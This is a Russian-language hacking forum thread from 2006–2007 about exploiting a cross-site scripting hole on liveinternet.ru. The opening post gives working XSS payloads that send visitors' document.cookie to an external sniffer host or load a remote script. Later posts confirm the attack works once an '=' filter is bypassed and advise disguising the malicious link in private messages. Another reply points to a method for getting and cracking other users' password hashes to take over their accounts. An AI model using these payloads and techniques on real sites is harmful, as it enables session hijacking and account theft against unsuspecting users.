HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Закрытая тема
 
Опции темы Поиск в этой теме Опции просмотра

liveinternet
  #1  
Старый 11.11.2006, 18:34
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
С нами: 10638498

Репутация: 2033
По умолчанию liveinternet

найдено D=P=CH= MOD=
http://www.liveinternet.ru/add

Вводим
"><script>alert("xss")</script>

алерт работает!
Но КУКИ не приходят!!!!
Хотя ввожу в поле "Ключевые слова" все верно:
"<img src="javascript:img = new Image(); img.src = 'http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;">
либо
"<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и даже этим способом:
"<srcipt src=http://мой_сайт.ru/js.js></script>

Пробую "регить сайт", заходя со своего акка.
Не приходят, мать их!!!

Не понимаю, в чем дело? Подскажите!

Последний раз редактировалось LeverOne; 11.11.2006 в 21:12..
 

  #2  
Старый 11.11.2006, 18:37
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
С нами: 10467686

Репутация: 930


По умолчанию

Может изза браузера.
 

  #3  
Старый 11.11.2006, 18:43
Kalowrat
Новичок
Регистрация: 03.11.2006
Сообщений: 12
С нами: 10273677

Репутация: 0
По умолчанию

проверь хтмл код когда вставил снифер.. у меня document.cookie обрезал движок сайта...
если ничо не путаю.. давно это было
 

ОК
  #4  
Старый 12.11.2006, 23:07
LeverOne
Познающий
Регистрация: 22.02.2006
Сообщений: 67
С нами: 10638498

Репутация: 2033
Talking ОК

Все работает.
Просто пытаются фильтровать "="
Ссылку советую маскировать во избежание доп. фильтрации в приватных сообщениях.
Вариант со скриптом на собственном хосте прекрасно прокатывает.
Тема исчерпана.
 

  #5  
Старый 26.02.2007, 00:35
DeadFire
Новичок
Регистрация: 05.05.2006
Сообщений: 5
С нами: 10535097

Репутация: 0
По умолчанию

А можно ли как-нибудь на liveintrnet добыть чужой пароль или хотябы читать "закрытые" сообщения (т.е. те которые только для друзей)??? Если да, то как.

Очень надо.

Заранее спасибо.
 

  #6  
Старый 26.02.2007, 10:55
InferNo23
Участник форума
Регистрация: 05.09.2006
Сообщений: 187
С нами: 10358246

Репутация: 378
По умолчанию

http://forum.antichat.ru/thread29020.html
получишь хеш пароля в md5(вроде бы)
потом расшифруешь пароль и зайдешь...
 
Закрытая тема





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Внести депозит

Введите сумму USDT:

Принимается только USDT TRC20. Fake/Flash USDT не засчитывается.

×

Вывести депозит

Сумма USDT:

Ваш USDT TRC20 кошелек:

Заявка будет отправлена администратору.